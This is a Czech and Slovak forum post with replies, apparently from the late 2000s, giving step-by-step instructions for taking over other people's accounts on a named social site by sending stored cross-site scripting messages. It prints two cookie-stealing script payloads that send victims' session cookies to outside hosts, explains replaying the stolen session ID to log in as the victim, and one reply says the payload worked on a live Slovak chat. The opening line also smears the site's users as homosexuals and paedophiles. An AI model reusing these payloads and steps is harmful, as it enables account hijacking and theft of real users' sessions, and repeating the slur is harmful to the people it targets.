tojsemja.cz je server pro mlade nadrzene naivni lidicky okolo 13ti let, homosexuali a pedofili. Navzajem si ukazuji fotky bedaru na zadecku a podobne. To o cem si pisou homosexualove a pedofilove nebudu rozebirat (je to nechutny).
Jak kamaradovi, kamaradce, homosexualovi, pedofilovi zmenit ucet?:
1. SET UR SELF ANONYMOUS!!!
2. vytvor noveho uzivatele
3. vytvorte si cookie stealer
4. poslete obeti zpravu ktera vypada nejak takto:
<script>document.location = 'http://evil.hell/cookiestealer.php?val=' + document.cookie</script>
5. pockejte az se pujde obet podivat do zprav
6. checknete log cookie stealeru
7. otevrete url http://tojsemja.cz/?akce=vzkazy&sid="zde vlozte hodnotu XLAND_SESSION_ID"
8. nini jdete na http://tojsemja.cz
9. MAKE IT BAD!
Prihlaseni plati po celem xlandu a vsech sluzbach.
Tip: chytani nahodnych XLAND_SESSION_ID
V nastaveni uctu jde pridat obrazek a k nemu komentar. Do komentare muzete vlozit podobny scriptik tomu predchozimu ktery presmerovava navstevniky. S tim uz si pohrajte sami.
Admini byli upozorneni na chyby, ale vyzvu ignorovali.
poznamky:
co je to cookie stealer najdete zde
input je osefovany, ale ne nejak extra.. jediny znak ktery se kontroluje je " ktery je nahraditelny znakem '
jo to nevim.. ale je to mozny
Ale, tam sa neda poslat script vo forme, aby bol vykonany - maximalne ho vypise ako text...
Alebo nie ? :o)
myslim ze je lepsie pouzit nieco ako:
<s cript>
obr = new Image();
obr.src = 'http://ab.cd/stealcookie.php?c=' + document.cookie;
</s cript>
nepouziva sa pri tom presmerovanie, takze sa zobrazi standartny obsah. Skusal som to na jednom
slovenskom chate a funguje to bezproblemov.
V pripade za sa sessionID nenastavuje cez GET parameter ako v tomto pripade.. da sa nastavit aj priamo v cookie. Ja pouzivam Cookie Editor extension Firefoxu.
good tip, a nerozdrbe to tak stranky :)